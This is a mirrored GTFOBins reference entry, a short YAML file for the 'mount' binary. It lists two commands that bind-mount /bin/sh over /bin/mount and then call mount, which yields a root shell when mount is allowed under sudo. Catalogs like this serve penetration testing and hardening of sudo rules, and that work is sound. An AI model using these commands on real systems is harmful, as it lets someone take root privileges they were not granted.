mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
12 lines
225 B
Plaintext
12 lines
225 B
Plaintext
---
|
|
functions:
|
|
privilege-escalation:
|
|
- code: |-
|
|
mount -o bind /bin/sh /bin/mount
|
|
mount
|
|
comment: |-
|
|
This overrides `mount` itself with a shell (or any other executable).
|
|
contexts:
|
|
sudo:
|
|
...
|